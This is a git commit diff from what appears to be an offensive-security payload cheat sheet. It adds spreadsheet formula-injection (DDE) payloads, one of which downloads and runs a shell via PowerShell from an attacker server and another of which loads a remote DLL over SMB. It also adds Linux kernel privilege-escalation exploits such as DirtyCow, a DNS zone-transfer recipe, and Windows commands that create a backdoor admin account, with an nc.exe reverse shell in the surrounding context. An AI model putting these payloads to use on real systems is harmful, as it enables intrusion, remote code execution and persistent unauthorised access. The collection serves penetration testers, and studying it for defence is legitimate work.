PrivEsc - Common Exploits

2024-12-18 18:36:10 +00:00 · 2019-06-09 20:53:41 +02:00 · 2019-06-09 20:53:41 +02:00 · 5d4f65720a
commit 5d4f65720a
parent e8cd11f88f
5 changed files with 66 additions and 2 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -7,10 +7,18 @@ Many web applications allow the user to download content such as templates for i
 Basic exploit with Dynamic Data Exchange

 ```powershell
+# pop a calc
 DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
+
+# pop a notepad
 =cmd|' /C notepad'!'A1'
+
+# powershell download and execute
 =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
+
+# msf smb delivery with rundll32
+=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
 ```

 Technical Details of the above payload:
--- a/Resources/Linux
+++ b/Resources/Linux
@ -43,6 +43,11 @@
 * [Groups](#groups)
    * [Docker](#docker)
    * [LXC/LXD](#lxclxd)
+* [Common Exploits](#common-exploits)
+    * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
+    * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
+    * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
+    * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)

 ## Checklists

@ -537,6 +542,45 @@ lxc exec mycontainer /bin/sh

 Alternatively https://github.com/initstring/lxd_root

+
+## Common Exploits
+
+### CVE-2016-5195 (DirtyCow)
+
+Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
+
+```powershell
+# make dirtycow stable
+echo 0 > /proc/sys/vm/dirty_writeback_centisecs
+g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
+https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
+```
+
+### CVE-2010-3904 (RDS)
+
+Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
+
+```powershell
+https://www.exploit-db.com/exploits/15285/
+```
+
+### CVE-2010-4258 (Full Nelson)
+
+Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
+
+```powershell
+https://www.exploit-db.com/exploits/15704/
+```
+
+### CVE-2012-0056 (Mempodipper)
+
+Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
+
+```powershell
+https://www.exploit-db.com/exploits/18411
+```
+
+
 ## References

 - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
--- a/Resources/Methodology
+++ b/Resources/Methodology
@ -176,6 +176,18 @@ masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
  index: 0x8 Account: root Name: root Desc: (null)
  ```  

+* Zone Transfer
+
+  ```powershell
+  host -t ns domain.local
+  domain.local name server master.domain.local.
+
+  host master.domain.local        
+  master.domain.local has address 192.168.1.1
+ 
+  dig axfr domain.local @192.168.1.1
+  ```
+
 ## List all the subdirectories and files

 * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
--- a/Resources/Windows
+++ b/Resources/Windows
@ -603,7 +603,6 @@ $ computer = "<hostname>"
 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
 ```

-
 ## EoP - Common Vulnerabilities and Exposure

 ### Token Impersonation (RottenPotato)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -5,7 +5,8 @@
 ```powershell
 net user hacker hacker1234* /add
 net localgroup administrators hacker /add
-net localgroup "Remote Desktop Users" hacker /add
+net localgroup "Remote Desktop Users" hacker /add # RDP access
+net localgroup "Backup Operators" hacker /add # Full access to files
 net group "Domain Admins" hacker /add /domain
 ```